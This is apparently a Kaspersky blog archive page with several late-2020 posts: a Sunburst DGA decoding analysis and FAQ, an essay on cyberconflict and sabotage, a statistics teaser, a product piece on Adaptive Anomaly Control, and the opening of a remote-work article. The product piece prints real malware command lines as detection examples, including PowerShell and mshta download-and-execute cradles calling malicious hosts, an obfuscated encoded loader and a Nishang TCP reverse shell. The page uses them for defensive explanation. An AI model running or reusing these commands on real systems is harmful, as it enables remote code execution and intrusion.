DNS request UID (64 bit) 6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud[.]com 0xEED328E059EB07FC 7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud[.]com 0x683D2C991E01711D gq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud[.]com 0x2956497EB4DD0BF9 ihvpgv9psvq02ffo77et.appsync-api.us-east-2.avsvmcloud[.]com 0xF7A37335B9E57DDB k5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud[.]com 0xA46E6E874771323C mhdosoksaccf9sni9icp.appsync-api.eu-west-1.avsvmcloud[.]com 0xA46E6E874771323C

In total, we analyzed 1722 DNS records, leading to 1026 unique target name parts and 964 unique UIDs.

Matching the two lists we got the following data:
domain name part(0x2956497EB4DD0BF9)=central.****.g
domain name part(0x2956497EB4DD0BF9)=ov
domain name part(0x683D2C991E01711D)=central.****.g
domain name part(0x683D2C991E01711D)=ov
domain name part(0xF7A37335B9E57DDB)=***net.***.com
These steps effectively decoded 3 of the 6 CNAME records provided by FireEye into two possible domains:

***net.***.com – a rather big telecommunications company from the US, serving more than 6 million customers
central.***.gov – a governmental organization from the US

Please note that for ethical reasons, we do not include these exact domain names here. We notified the two organizations in question though, offering our support to discover further malicious activities, if needed.

It should also be noted that there is no way to be sure that machines in these two domains were actually further exploited. This being a probabilistic puzzle, we can assume with a high degree of certitude the two decoded domains were interesting to the attackers, however, we cannot be 100% sure that associated organizations were the subject of further malicious activities.

To summarize our research, the UIDs we discovered match two domain names that belong to a US government organization and a large US telecommunications company. It is likely that other interesting targets were selected by the attackers for further exploitation. If you happen to have access to large DNS databases, including CNAME replies for any subdomain in “avsvmcloud[.]com”, please let us know! (contact: intelreports (at) kaspersky [dot] com)

In order to help the community to potentially identify other interesting targets for the attackers, we are publishing the source code for the decoder:
https://github.com/2igosha/sunburst_dga

Stay safe!

More details and mitigations about Sunburst, UNC2452 / DarkHalo are available to customers of Kaspersky Intelligence Reporting. Contact: intelreports (at) kaspersky [dot] com

Sunburst / UNC2452 / DarkHalo FAQ
  1. Who is behind this attack? I read that some people say APT29/Dukes?
    At the moment, there are no technical links with previous attacks, so it may be an entirely new actor, or a previously known one that evolved their TTPs and opsec to the point where they can’t be linked anymore. Volexity, who previously worked on other incidents related to this, named the actor DarkHalo. FireEye named them “UNC2452”, suggesting an unknown actor. While some media sources linked this with APT29/Dukes, this appears to be either speculation or based on some other, unavailable data, or weak TTPs such as legitimate domain re-use.
  2. I use Orion IT! Was it a target of this attack?
    First of all, we recommend scanning your system with an updated security suite, capable of detecting the compromised packages from SolarWinds. Check your network traffic for all the publicly known IOCs – see https://github.com/fireeye/sunburst_countermeasures. The fact that someone downloaded the trojanized packages doesn’t also mean they were selected as a target of interest and received further malware, or suffered data exfiltration. It would appear, based on our observations and common sense, that only a handful of the 18,000 Orion IT customers were flagged by the attackers as interesting as were further exploited.
  3. Was this just espionage or did you observe destructive activities, such as ransomware?
    While the vast majority of the high-profile incidents nowadays include ransomware or some sort of destructive payload (see NotPetya, Wannacry) in this case, it would appear the main goal was espionage. The attackers showed a deep understanding and knowledge of Office365, Azure, Exchange, Powershell and leveraged it in many creative ways to constantly monitor and extract e-mails from their true victims’ systems.
  4. How many victims have been identified?
    Several publicly available data sets, such as the one from John Bambenek, include DNS requests encoding the victim names. It should be noted that these victim names are just the “first stage” recipients, not necessarily the ones the attackers deemed interesting. For instance, out of the ~100 Kaspersky users with the trojanized package, it would appear that none were interesting to the attackers to receive the 2nd stage of the attack.
  5. What are the most affected countries?
    To date, we observed users with the trojanized Orion IT package in 17 countries. However, the total number is likely to be larger, considering the official numbers from SolarWinds.
  6. Why are you calling this an attack, when it’s just exploitation? (CNA vs CNE)
    Sorry for the terminology, we simply refer to it as a “supply chain attack”. It would be odd to describe it as a “supply chain exploitation”.
  7. Out of the 18,000 first stage victims, how many were interesting to the attackers?
    This is difficult to estimate, mostly because of the lack of visibility and because the attackers were really careful in hiding their traces. Based on the CNAME records published by FireEye, we identified only two entities, a US government organization and a telecommunications company, who were tagged and “promoted” to dedicated C2s for additional exploitation.
  8. Why didn’t you catch this supply chain attack in the first place?
    That’s a good question! In particular, two things made it really stealthy. The slow communication method, in which the malware lies dormant for up to two weeks, is one of them. The other one is the lack of x86 shellcode; the attackers used a .NET injected module. Last but not least, there was no significant change in the file size of the module when the malicious code was added. We observed two suspicious modules in 2019, which jumped from the usual 500k to 900k for SolarWinds.Orion.Core.BusinessLayer.dll. When the malicious code was first added, in February 2020, the file didn’t change size in a significant manner. If the attackers did this on purpose, to avoid future detections, then it’s a pretty impressive thing.
  9. What is Teardrop?
    According to FireEye, Teardrop is malware delivered by the attackers to some of the victims. It is an unknown memory-only dropper suspected to deliver a customized version of the well-known CobaltStrike BEACON. To date, we haven’t detected any Teardrop samples anywhere.
  10. What made this such a successful operation?
    Probably, a combination of things – a supply chain attack, coupled with a very well thought first stage implant, careful victim selection strategies and last but not least, no obvious connections to any previously observed TTPs.
2020. december 18.

The future of cyberconflicts

The ever-increasing role of technology in every aspect of our society has turned cybersecurity into a major sovereignty issue for all states. Due to their asymmetrical nature, offensive cyber-capabilities have been embraced by many countries that wouldn’t otherwise have the resources to compete on a military or economic level with the most powerful nations of the world. Most modern inter-state conflicts and tensions today also take place in so-called cyberspace and we strongly believe that this trend will persist.

Such conflicts can take a vast number of forms, based on the objectives an attacker might pursue to undermine a competitor. In the context of this article, we will only focus on two of them: (1) Cyber-warfare for intelligence purposes, and (2) sabotage and interference with strategic systems in order to hinder a state’s ability to govern or project power.

Cyberspace and intelligence

Attempts to collect intelligence through technical means have been documented for years. The earliest example dates all the way back to 1996’s infamous Moonlight Maze campaign, where attackers stole so many documents a printout would have stood “thrice as high as the Washington monument”. Twenty-five years later, Kaspersky tracks over a hundred groups who perform similar operations. Here are a few reasons why they are so widespread:

  • Offensive security tools are readily available.
    • Intrusion software just as sophisticated as the frameworks developed by APT actors is gradually released to the public for free. This includes widely available proofs of concepts for software vulnerabilities to gain access to target machines, open-source malware implants to establish persistence and a myriad of tools that allow lateral movement inside breached networks. Newcomers to the cyber game benefit from the experience acquired by their predecessors and the research conducted by the industry as a whole, which helps them bootstrap their operations at a very affordable cost.
    • A flourishing market has developed around offensive security, where companies provide tools or even mercenary services. The ones that are willing to communicate about their activities swear that they will only do business with democratic governments, but it should be pointed out that they undergo virtually no oversight.
  • The difficulty of reliable technical attribution of cyberattacks ensures that instigators face very limited diplomatic repercussions (although a number of countries have recently developed legal frameworks which allow them to impose sanctions). A few countries have public doctrines or strategies pertaining to cyber-engagements, though those documents don’t always provide detailed and full answers on how countries will react, particularly, in the case of cyberattacks posing a threat to their national security, which countermeasures they would take, when cyberattacks would be qualified as use of force and, broadly speaking, how the UN charter’s article 51 pertaining to legitimate defense should be interpreted and applied. The earliest example of such a policy we could find is from the United States, in which they argue that article 51 does apply to cyberspace. France also has one, and a few other countries have also published their official positions on the application of international law to cyberspace (Estonia, Australia, Austria, Czech Republic, Finland, Iran, the Netherlands and the UK).

Cyberespionage attempts have been observed from all types of nations (emerging and robust cyber powers, countries that find themselves at the center of international tensions, and even countries which are traditionally considered allies) against all sorts of actors (government and non-government organizations, multinational companies, small businesses and individuals) to try to collect intelligence of any nature (technological, military, strategic). While the newer actors are filling the skills gap quickly, the most advanced parties are scaling to obtain global surveillance capabilities through technological supremacy. This involves developing the standards for tomorrow’s communications infrastructures and ensuring that they are adopted on a worldwide scale.

A particular example stands at the intersection of these two axes: the dispute pitting the US against China on the 5G standard. The US Defense Innovation Board points out the crucial impact of network topology on industry development and notes that the Department of Defense (DoD) itself will use the new standard; as a result, it feels it should have at least some degree of control over it. The US government has also publicly accused foreign technology companies of facilitating espionage operations on various occasions.

Recommendations
  • No state in the world has the technical ability to prevent cyberattacks, whether they target a country directly or target its industry.
    • In the short term, only bilateral agreements (such as the one between China and the US in 2015) appear to significantly reduce the number of incidents.
    • In the long term, a large number of experts needs to be trained to provide the private sector with enough resources to defend itself efficiently against cyberthreats.
  • The existing international instruments, such as the Wassenaar agreements do not provide a sufficiently binding legal framework to prevent companies from earning a profit by selling attack tools or vulnerabilities. Decision-makers should look into the proliferation of ICTs that can be used for malicious use.
  • The international community must find a way to create tomorrow’s standards conjointly. The competition between states to ensure control over the next technological tiers could result in a balkanization of the digital space.
  • Foreign companies, especially those developing network equipment or handling sensitive data, can only overcome mistrust if they are willing to subject themselves to stringent scrutiny.
    • States should adopt legislation detailing the obligations of any company willing to participate in public procurement for digital goods: source code access, formal proof of the software, having an audit conducted by a trusted third party.
Sabotage

Just because cyberspace conflicts take place in a virtual world doesn’t mean they cannot affect the physical realm. An overwhelming proportion of today’s human activity relies on information technology which implies that the former can be disrupted through the latter. A list of verticals that should be protected from foreign investments was introduced in French law: energy, water distribution, transportation, health, telecommunications. It’s easy enough to see that each of them is regulated by computer systems that constitute high-value targets for a hostile party.

The Ukrainian conflict, which seems to be used as a large-scale hybrid war experiment by some actors, gives an idea of the many ways cyberwarfare could be used to destabilize a country:

  • In May 2014, three days before the Ukrainian elections, a company called Infosafe IT withstood an attack aimed at preventing election results from being centralized. The day results were published, a fake press release announcing the victory of a far-right candidate was distributed through the electoral commission’s website.
  • A cyberattack against three Ukrainian energy providers on December 23, 2015, left 225,000 clients with no electricity for several hours. A similar incident happened in Kiev for about one hour on December 16, 2016.
  • On June 27, 2017, a Ukrainian tax accounting package used by most companies in the country (MeDoc) downloaded a malicious update that contained ransomware. Further analysis revealed that data decryption was not possible and that it was likely an attempt to destroy data forever. The incident caused over $10 billion in damages, making it the most destructive cyberattack in history.

In other countries, the Stuxnet worm comes to mind. This piece of malware contained four 0day exploits and was design to infect SCADA systems in the Natanz nuclear plant in Iran. Infected systems would send erroneous commands to the underlying programmable logic controller (PLC) while still displaying expected results to the plant operators. This damaged the centrifuges and confused researchers, effectively slowing down Iran’s research in the nuclear physics field. But the general, modular design of Stuxnet indicates that variants could have been created to go after other types of SCADA system. This detail could be indicative of a larger (and unpublished) sabotage doctrine followed by the creators of Stuxnet.

It is unclear whether it followed Stuxnet’s precedent, but a couple of years later, a wave of destructive attacks was launched against the oil industry in the Middle East. Shamoon was far from the sophistication level of our previous example, but it did major damage nonetheless. It involved a wiper malware whose purpose was to erase files from the victim’s computers and render them unusable. When it was first used in 2012, it disabled over 30,000 computers.

Then, in 2017, a Saudi refinery was targeted by an attack against its safety systems in a deliberate attempt to cause physical harm. The malware, dubbed Triton, was designed to tamper with an industrial safety system’s emergency shutdown function. Thankfully, the attack only resulted in interruption to a chemical process and did not cause the uncontrolled energy buildup the attackers were likely trying to achieve.

In recent years, many incidents have involved wipers: Dark Seoul and the Sony hack as well as operation Blockbuster attributed to the Lazarus Group, and others involving the StoneDrill malware we discovered while investigating Shamoon. So far, we are not aware of any casualties caused by destructive cyberattacks, but there’s little doubt that they are used as coercive force and can be construed as a form of violence. An interesting question is whether they could be interpreted as “acts of war”.

In August 2019, NATO released a cyber-resilience supplement in which the organization stated: “a serious cyberattack could trigger Article 5, where an attack against one ally is treated as an attack against all”. While the notion of “serious cyberattack” is not clearly defined, it does send a strong political signal that actions taking place in cyberspace can be interpreted as an attack and may in fact cause a collective response from the alliance. In the military sense, this declaration establishes cyberspace as a battleground. Other countries appear to share this view: in 2019, Israel bombed a building it claimed was used by Hamas to conduct cyberattacks against its interests. While this was not the first time a state went after hackers in the physical world, it was an unprecedented example of immediate cyber-to-kinetic escalation. Those few nations (i.e., the US and France) who published cyber-engagement policies usually reserve the right to respond to attacks in cyberspace through any appropriate means, which implicitly includes lethal force.

Since sabotage operations disrupt a government’s ability to rule or have the power to shut down a country’s economy, they represent a major threat to sovereignty. In the most extreme case, attacks in cyberspace can lay the ground for (or support) traditional military operations, for instance by disabling security systems or communication devices that would usually help organize the defensive response.

In the coming years, we can expect that:

  • The sort of attacks described above will become more widespread. The impact of these operations is now evident and they should be expected in any future armed conflict.
  • Some sabotage attempts will happen under a false flag to muddle diplomatic relations between two countries. Some actors have already taken significant steps to influence the way their actions would be interpreted:
    • The aforementioned MeDoc attack was disguised as a criminal ransomware attempt.
    • French TV channel TV5 Monde was hacked and taken off air for 18 hours in a destructive attack that also destroyed data. The hack was claimed by an ISIS-aligned group (Cyber Caliphate), but is believed to have originated from a Russian threat actor instead.
    • An attack against the PyeongChang Olympic games contained indicators implicating North Korea that we now know to be fake.
  • Diplomatic duress or retaliation might take place in the form of sabotage and cyber-capabilities will be used to exert pressure between states. For instance, critical infrastructure could be disabled, or local companies could be taken down as a way to express discontent. Demonstrating such offensive cyber-capabilities would convey strong messages that would be less of a commitment than moving troops.
Recommendations

In the interest of promoting cyber-stability and reducing the impact of sabotage, we would like to propose the following:

  • States should publish a doctrine that defines how they regard engagements in cyberspace, if they haven’t already done so. A more detailed call for transparency from Kaspersky can be found in the various contributions we submitted to the UN’s OEWG. This doctrine should take into account how uncertain the attribution process for cyberattacks is.
  • Making sure that critical systems are located exclusively on networks that are not connected to the internet. By spearheading the concept of cyber immunity, Eugene Kaspersky provides additional recommendations to make such infrastructure more resilient.
  • Clarifying rules of cyber-engagements at an international level as well as providing clarity on how they should be implemented both to ban and prevent destructive attacks targeting civilian infrastructure. We also advocate for greater clarity from states on how cyberconflicts can be de-escalated.
  • Having a proactive approach that aims at detecting intrusions in strategic entities (as opposed to simply preventing them). A sabotage operation requires months of preparation after the victim’s network has been breached. During that time, the defenders have a chance to discover the attackers and contain them before actual harm has been done.
Conclusion

It may seem naïve to imagine that the international community could at this moment reach a broad consensus regarding the rules for cyberwarfare or how the existing IHL applies to cyberspace. Yet over the past century, the world managed to define a number of acceptable rules for military conflicts: the Geneva Convention defines rights afforded to non-combatants. But while in traditional warfare it is easy to evaluate the cost (usually in human lives) of being subjected to certain practices, the nature of cybersecurity makes this quite difficult: intelligence collection and data theft are invisible, information campaigns can’t always be identified as such and sabotage may be indistinguishable from accidents. In other words, decision-makers have data that shows the benefit of unregulated cyberwarfare, thanks to their own operations, but are oblivious to what it costs them. This partial vision, shared by all actors, does not encourage moderation.

And so, this article closes on a pessimistic note. Do any of the parties involved have an interest in regulating cyberwarfare? If they did, would they even be aware it? Historically, means of destruction could only be downsized thanks to civil protest and public pressure. In the end, no matter how far away or even unrealistic the dream of world peace seems to be, it is still one worth fighting for. As for the information technology field, it has been described as “young” and “growing” for the past 30 years. Maybe now is the time it became “adult”.

2020. december 15.

Kaspersky Security Bulletin 2020. Statistics

All statistics in this report are from the global cloud service Kaspersky Security Network (KSN), which receives information from components in our security solutions. The data was obtained from users who have given their consent to it being sent to KSN. Millions of Kaspersky users around the globe assist us in this endeavor to collect information about malicious activity. The statistics in this report cover the period from November 2019 to October 2020, inclusive.

Figures of the year
  • During the year, 10.18% of Internet user computers worldwide experienced at least one Malware-class attack.
  • Kaspersky solutions blocked 666,809,967 attacks launched from online resources in various countries across the world.
  • 173,335,902 unique URLs were recognized as malicious by Web Anti-Virus.
  • Our Web Anti-Virus blocked 33,412,568 unique malicious objects.
  • Ransomware attacks were defeated on the computers of 549,301 unique users.
  • During the reporting period, miners attacked 1,523,148 unique users.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the devices of 668,619 users.
MktoForms2.loadForm("//app-sj06.marketo.com", "802-IJN-240", 27001, function(form) { form.onSuccess(function(values, followUpUrl){ //Take the lead to a different page on successful submit, ignoring the forms configured followUpUrl. location.href = "https://go.kaspersky.com/rs/802-IJN-240/images/KSB_statistics_2020_en.pdf"; //return false to prevent the submission handler continuing with its own processing return false; }); }); .googleRecaptcha { padding: 20px !important; } var GOOGLE_RECAPTCHA_SITE_KEY = '6Lf2eUQUAAAAAC-GQSZ6R2pjePmmD6oA6F_3AV7j'; var insertGoogleRecaptcha = function (form) { var formElem = form.getFormElem().get(0); if (formElem && window.grecaptcha) { var div = window.document.createElement('div'); var divId = 'g-recaptcha-' + form.getId(); var buttonRow = formElem.querySelector('.mktoButtonRow'); var button = buttonRow ? buttonRow.querySelector('.mktoButton[type="submit"]') : null; var submitHandler = function (e) { var recaptchaResponse = window.grecaptcha && window.grecaptcha.getResponse(widgetId); e.preventDefault(); if (form.validate()) { if (!recaptchaResponse) { div.setAttribute('data-error', 'true'); } else { div.setAttribute('data-error', 'false'); form.addHiddenFields({ reCAPTCHAFormResponse: recaptchaResponse, }); form.submit(); } } }; div.id = divId; div.classList.add('googleRecaptcha'); if (button) { button.addEventListener('click', submitHandler); } if (buttonRow) { formElem.insertBefore(div, buttonRow); } if (window.grecaptcha.render) { var widgetId = window.grecaptcha.render(divId, { sitekey: GOOGLE_RECAPTCHA_SITE_KEY, }); formElem.style.display = ''; } } }; function onloadApiCallback() { var forms = MktoForms2.allForms(); for (var i = 0; i < forms.length; i++) { insertGoogleRecaptcha(forms[i]); } } (function () { MktoForms2.whenReady(function (form) { form.getFormElem().get(0).style.display = 'none'; jQuery.getScript('//www.google.com/recaptcha/api.js?onload=onloadApiCallback'); }); })();
2020. december 14.

Adaptive protection against invisible threats

Corporate endpoint security technologies for mid-sized companies struggle to surprise us with anything brand new. They provide reliable protection against malware and, when combined with relevant policies, regular updates, and employee cyberhygiene, they can shield a business from a majority of cyber-risks. For some, it may seem like you do not need more security than this… But is that really the case?

The answer, in short, is no. In fact, in most medium-sized companies’ cybersecurity strategies, even with an endpoint solution, there are likely to still be gaps that can and should be closed. In this article, we look at what those gaps are and how to fill them.

Legitimate software can hide risks

Detecting an exploit or trojan that explicitly runs on a device is not a problem for an antivirus solution. But when a malicious script is launched through a legitimate application, this can be a challenge. For example, when a phishing email document is opened in Microsoft Office, all actions will be performed by the office application.

Such authorized software is often used on a large number of devices, and it is not feasible to simply ban access to it. Antivirus solutions will also recognize these files as “trusted”, so may be unable to quickly “understand” that the piece of office software is executing atypical processes initiated by malicious code. Moreover, such activity can sometimes be started by administrators themselves as part of system maintenance. For example, the “trusted” Windows Management Engine on a remote machine can be used for deployment purposes. This further complicates the threat detection process.

What it can lead to: fileless malware, insider threats, miners and ransomware

Downloaders are one type of malware that uses this legitimate software cover. It does not itself perform any direct malicious actions on the device. Instead, it gets to the machine, for example, through a phishing email, and then independently downloads the real malicious code onto it.

There is a specific type of malware – fileless malware – that is often used as a downloader. It does not store itself on the hard disk, therefore tracking it with an ordinary antivirus solution is not easy. Because of that, fileless malware is often used in advanced targeted attacks, such as Platinum APT, whose victims were state and diplomatic organizations. Another example is the advanced PowerGhost cryptominer, which used trusted software for cryptocurrency mining. According to Kaspersky statistics, of all the anomalous activity detected in legitimate Windows Management Instrumentation processes (WMI), two-thirds (67%) were fileless downloaders of the Emotet banking trojan and the WannMine cryptominer. WMI on remote machines is often used by malware for lateral movement.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Malware families running in WMI (download)

Now, some might think that simply tightening policies and scaling down user privileges is the way to stop the malware from starting any process on the device. However, this is not an option, because fileless malware does not need administrator privileges to perform its malicious actions.

Another possible risk of authorized software exploitation occurs when malicious activity is initiated by someone on the network. If the company is lucky, it is just an employee who decided to mine coins using the corporate computing power. But in this case, since the actions are performed by a trusted user, administrators or a security solution may not be able to detect them.

Finally, some forms of malware can use legitimate processes to disguise themselves (svchost.exe, for example), which makes them more difficult to detect manually by IT security teams.

What can help? You need Little Red Riding Hood 2.0, who detects the wolf through external signs and calls lumberjacks before being eaten

To eliminate these threats, IT security teams need technology that allows them to detect any suspicious application activity from a corporate cybersecurity perspective. Spotting anomalies in trusted software helps to identify threats at the very early stages, when the malware is already on the device but before the antivirus reacts to it. This technology, developed by Kaspersky, is called Adaptive Anomaly Control.

To make ​​anomaly detection work, several problems need to be solved. First, how does Adaptive Anomaly Control know which activity is abnormal and which is not? Secondly, if the control notifies an administrator about each deviation, many of the notifications will most likely turn out to be just false positives for scripts launched as part of a workflow. In that situation, the user will immediately want to disable the control.

To resolve that, the technology should first be “trained” to recognize how applications work and what actions are performed regularly by employees as part of their job responsibilities. This minimizes the number of false positives and keeps administrators from going crazy. And, most importantly, if Adaptive Anomaly Control notifies the IT security manager about suspicious activity to ensure they understand when action needs to be taken immediately. Thus, the technology will turn from “the boy who kept crying wolf” into an advanced version of Little Red Riding Hood, who manages to recognize the wolf in the guise of her grandmother early on and call the lumberjacks for help before she gets eaten.

How Adaptive Anomaly Control works

Adaptive Anomaly Control works on the basis of rules, statistics and exceptions. Rules cover three groups of programs: office programs, Windows Management Instrumentation, and script engines and frameworks, as well as the abnormal program activity category. The rules are already developed in the product, so there is no need to write them manually.

List of rules for office applications

To start with, Adaptive Anomaly Control has training mode activated for about two weeks. During this time, it monitors the network and collects statistics on application usage. Technically, Adaptive Anomaly Control mostly analyzes process creation actions. For example, the command line code of a new process, file path and name of executable, and also the calling stack can be analyzed to determine an anomaly. The technology marks regular anomalies, which indicate that processes are started by employees for work purposes. Based on the data received, it then sets exceptions to the rules. If administrators use scripts that could potentially trigger the rules, they can create exceptions before turning on the component, which will improve the quality of the training process.

The training period avoids false positives, but it also helps to catch important anomalies. If a false positive occurs within a rule, administrators can choose not to block the entire network with the exception, but instead configure it for just the particular script that triggered the rule. This mitigates the risk of throwing a global exception that makes the component useless.

The policies can be tuned for different groups of users individually and inherited as part of user profiles. For example, financial department employees would never legitimately need to execute JavaScript, but the development team will. Therefore, for the software development department, some rules may be disabled or provided with numerous exceptions, while for the financial department, they may be turned on. Adaptive Anomaly Control identifies the user group in which the rule is triggered to block or allow execution accordingly.

Adding an exclusion for a user or group

After the training period, when Adaptive Anomaly Control enters combat mode, the component notifies the IT security manager about any anomalies outside of the exceptions specified during the training period. It provides information for investigation, such as what processes triggered the operations, on what computers and under what users.


Example of anomalous activity by Microsoft Word and possible actions

For example, a PowerShell script trying to start a Windows Command Processor, HTML Application Host, or Register Server from office software may be considered suspicious. Launching these activities is technically possible but not typical of regular operation. Let us focus on some real-life examples which Adaptive Anomality Control component detects. Fin7 spear phishing campaigns have included malicious Word documents with DDE execution of PowerShell code, which were detected and blocked (doc MD5: 2C0CFDC5B5653CB3E8B0F8EEEF55FC32).

Fin7 document with DDE execution

Command-line code from inside a document:

powershell -C ;echo "https://sec[.]gov/";IEX((new-object net.webclient).downloadstring('https[:]//trt.doe.louisiana[.]gov/fonts.txt'))

Another example is the LockiBot’s downloader, which was also started from within office software (doc MD5: 2151D178B6C849E4DDB08E5016A38A9A):

mshta http[:]//%20%20@j[.]mp/asdaaskdasdjijasdiodkaos

Adaptive Anomality Control also detects suspicious drop attempts by office applications. For example, a Qbot document-dropped payload was detected: C:\Arunes\caemyuta\Polaser.exe (doc MD5: 3823617AB2599270A5D10B1331D775FE). Another example of a detected dropper is this Cymulate Framework document activity: %tmp% \c0de203103ce5f0a5463e324c1863eb1_CymulateNativeReverseShell.exe (exe MD5: D8DBF8C20E8EA57796008D0F59104042).

Similarly, with Windows Management Instrumentation, Adaptive Anomaly Control may react if HTML Application Host or a PowerShell script is launched from WMI. In addition, according to Kaspersky research, most malicious activity (62%) is detected in the WMI group. WMI is a common tool among malware developers because of its convenience. It allows for easy starting of PowerShell code and performs a wide range of actions, such as system intelligence collection.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

The number of unique users attacked, by detection group (download)

For example, the Silent Break Security framework was detected during lateral movement using WMI, which ran this inline PowerShell code:

powershell -NoP -NonI -W Hidden -C "$pnm='57wXU7nxLgCRzFJ1q';$enk='cX6MKM670IO+B5YCcnL8RWbc27WOIIdNxhq45TAcCdI=';sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('vTxt...<SKIPPED LONG BASE64 STRING>...yULif/Pj/'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"

Such cryptominers as WannaMine and KingMiner also use WMI for spreading across networks. Below, you can see their command-line code that triggered detection:

powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/networks.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/netstat.ps1')}"

mshta.exe vbscript:GetObject("script:http[:]//165233.1eaba4fdae[.]com/r1.txt")(window.close)

In the group of script engines and frameworks, activities such as running dynamic or obfuscated code may be suspicious. For example, LemonDuck’s fileless downloader was detected during lateral movement:

IEX(New-Object Net.WebClient).DownloadString('http[:]//t.amynx[.]com/gim.jsp')

Originally, it was a base64-encoded inline PowerShell script. The decoded version is shown here for convenience.

Another example in the group of script engines is Clipbanker’s scheduled task command line, also originally a base64-encoded inline PowerShell script:

iex $(Get-ItemProperty -Path HKCU:\Software -Name kumi -ErrorAction Stop).kumi

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell code for offensive security, penetration testing and red teaming. An example of a detected fileless PowerShell backdoor:

$sm=(New-Object Net.Sockets.TCPClient(`XX.XX.XX.XX`,9999)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

As part of the abnormal program activity category, files with anomalous names or locations are tracked: for example, a third-party program which has the name of a system file but is not stored in the system folder. Also, suspicious files inside system directories are tracked: for example, a ShadowPad backdoor was started inside a system folder: C:\windows\debug\srv.exe (MD5: DLL-hijacking used, dll MD5: CC2F7D7CA76A5223E936570A076B39B8). Adaptive Anomaly Control detects such activity. Another detected example is a Swisyn backdoor at: C:\windows\system\explorer.exe (MD: 8E0B4BC934519400B872F9BAD8D2E9C6). The botnet Mirai also places its parts in a system folder and gets detected: C:\windows\system\backs.bat (MD5: 7F70B9755911B0CDCFC1EBC56B310B65).

A detailed log of Adaptive Anomaly Control rules applied to various user groups

“Process action blocked” notification

The Adaptive Anomaly Control algorithm shows how the decision-making process performed during the training period. If a rule was not triggered at all during training, the technology will consider the actions associated with this rule as suspicious and block them. If a rule is triggered, an administrator receives a report and decides what the technology should do: block the process or allow it and notify the user. Another option is to extend the training to monitor further the way the rule is working. If the user does not take any action, the control will also continue to work in smart training mode. The training mode time limit is then reset.

Adaptive Anomaly Control training algorithm

If this technology is so effective, then what are all the other protection features needed for?

Adaptive Anomaly Control solves the specific task of early threat detection. It does so automatically and requires no special administration skills or proactive measures. This means the technology cannot detect the malware itself, just its delivery to the network, as well as the potentially dangerous actions launched by the insider, or the malicious activity of programs that have a status of “not a virus”. It is always easier to treat the disease at an early stage, so early detection of threats helps to get rid of them faster, with less workload on the IT and information security departments.

However, it is equally important to use the entire range of protective measures including signature-based malware detection, behavioral analysis, vulnerability detection and patch management, and exploit prevention. These technologies help to bock most generic attacks, which means that advanced protection mechanisms such as Adaptive Anomaly Control are offloaded to detect the really complex evasive threats. Adaptive Anomaly Control is used for covering this specific risky area and it is effective in this role, while other endpoint technologies have to address their respective areas of expertise. This way, the complete cybersecurity solution will be efficient enough to protect the business from cyberthreats.

2020. december 10.

The story of the year: remote work

The coronavirus pandemic has caused sudden, sweeping change around the world. The necessary social distancing measures are having an impact on all of us. One large part of society that has been affected by these measures more than others is the employed. While direct customer facing businesses like restaurants and retailers have had to change their opening hours, adapt their business models or close their doors entirely, there are still millions of jobs that can be done at home, outside of the usual office working environment.

Organizations need to adapt to meet employee needs and ensure they stay productive, motivated and secure. With so many of us being asked to work in new ways in order to stay connected to our colleagues and customers, it is important to remember both the professional and personal challenges working from home on a permanent basis can bring. Quite obviously, this situation has brought a lot of issues into our lives. A survey conducted in April 2020, as things were changing rapidly, revealed that around half (46%) of respondents had never worked from home before and therefore, were not entirely ready for such changes.

There is a lot to be said about social and productivity issues caused by the new rhythm of work, but in fact, things were not that bad, because remote work in some cases helped people to have a better work-life balance and even be more productive.

What changed: guilty pleasures and life-work disbalance

Remote work is not an entirely new phenomenon; its benefits have been discussed for years now. In some industries, like IT, remote work has already been quite widespread. Last year, Kaspersky analyzed some of the positives of remote work. This research highlighted some of the most significant benefits of remote work, including increased employees’ productivity, improved work-life balance and reduced absenteeism. Situation in the world this year made it possible to verify such assumptions.

At the same time, the massive move towards remote work was not particularly voluntary – employees who were forced to work from home did not always welcome this opportunity as they had to contend with new challenges. However, they have also uncovered some substantial benefits:

  • Comfort level: Employees became both more comfortable and uncomfortable. A study by Kaspersky in April found that nearly a third of employees (32%) working from home were struggling with back pain after being forced to use kitchen stools or a sofa to work. However, by November, employees had begun to compensate for this discomfort with certain “guilty pleasures”, such as “working in comfy clothes all day” (with 48% wanting to have this option in the future) and even “working without clothes”.

What lockdown/pandemic guilty pleasures would you like to keep?

  • Family issues: Being at home all day has, not surprisingly, had an effect on people’s relationships with their loved ones, with 21% of respondents from the same study in April admitting to experiencing family issues due to remote work. Two drivers of this conflict are not having a separate room for every family member who needs to work from home (26%) and arguments about how much children should use the Internet (33%). But remote work is not all bad for families, as recent study found that 47% were now able to spend more time with their families, highlighting it as the key benefit of the whole work-from-home situation.

What positive things have come out of the pandemic that you would like to keep?

